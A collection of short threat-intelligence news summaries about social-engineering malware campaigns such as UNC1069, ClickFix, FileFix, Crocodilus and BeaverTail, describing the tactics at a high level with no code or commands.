The North Korean group UNC1069 has intensified its focus on financial institutions, employing advanced AI tools for social engineering attacks. They utilize new malware to exploit vulnerabilities and steal sensitive data from victims, including credentials and browser information.

UNC1069, a North Korean threat group, has been exploiting social engineering tactics and AI tools to infiltrate cryptocurrency companies. Their recent attack involved a compromised Telegram account, a fake Zoom meeting with a deepfake video, and multiple malware families to harvest sensitive data. The operation highlights a significant evolution in their methods since 2018.

A new report reveals that the TamperedChef malware campaign tricks users into downloading malicious installers disguised as legitimate software. The attackers use social engineering techniques and compromised code-signing certificates to deliver a JavaScript backdoor that enables remote access and control. Affected sectors include healthcare, construction, and manufacturing, with a concentration of infections in the U.S.

This article details an organized cybercriminal operation that primarily targets cryptocurrency users and Web3 employees through sophisticated malware and social engineering tactics. The gang, linked to multiple traffer groups, has generated at least $2.4 million in theft, using fake applications and extensive infrastructure to deliver their attacks.

Microsoft identified an updated ClickFix campaign that disrupts users' browsers and tricks them into executing harmful commands. This variant uses social engineering and exploits native Windows utilities to deliver a Python RAT payload while evading traditional detection methods.

The latest version of the 'Crocodilus' Android malware now includes a feature that adds fake contacts to infected devices, allowing attackers to spoof trusted callers and enhance their social engineering tactics. Initially identified in Turkey, the malware has expanded its reach globally and incorporates advanced evasion techniques to avoid detection while stealing sensitive data. Android users are advised to exercise caution and download only from trusted sources to mitigate risks.

A North Korean hacking group, dubbed Elusive Comet, has been caught using Zoom's remote control feature to hijack victims' computers during seemingly legitimate business calls. By employing social engineering tactics, they trick individuals into granting remote access, allowing malware installation and data exfiltration.

A new FileFix social engineering attack mimics Meta account suspension alerts to deceive users into installing the StealC infostealer malware. It utilizes a multi-language phishing page that instructs victims to copy a disguised PowerShell command into the File Explorer address bar, ultimately leading to the execution of malicious code hidden within a JPG image. Acronis highlights the evolution of this attack method and emphasizes the need for heightened awareness against such sophisticated phishing tactics.

A sophisticated phishing scheme named BeaverTail masquerades as a job offer for an AI engineering role, tricking developers into executing malicious code from a fake GitHub repository. This malware operates in five stages, stealing sensitive information, establishing remote access, and deploying additional malicious components while exploiting trust through social engineering tactics.

A new campaign utilizing ClickFix attacks is now targeting both Windows and Linux systems, with the threat group APT36 adapting social engineering tactics to trick users into executing malicious commands. The Linux variant involves redirecting victims to a CAPTCHA page that prompts them to run a benign command, potentially paving the way for future attacks. Users are advised to avoid executing unknown commands to mitigate the risk of malware infections.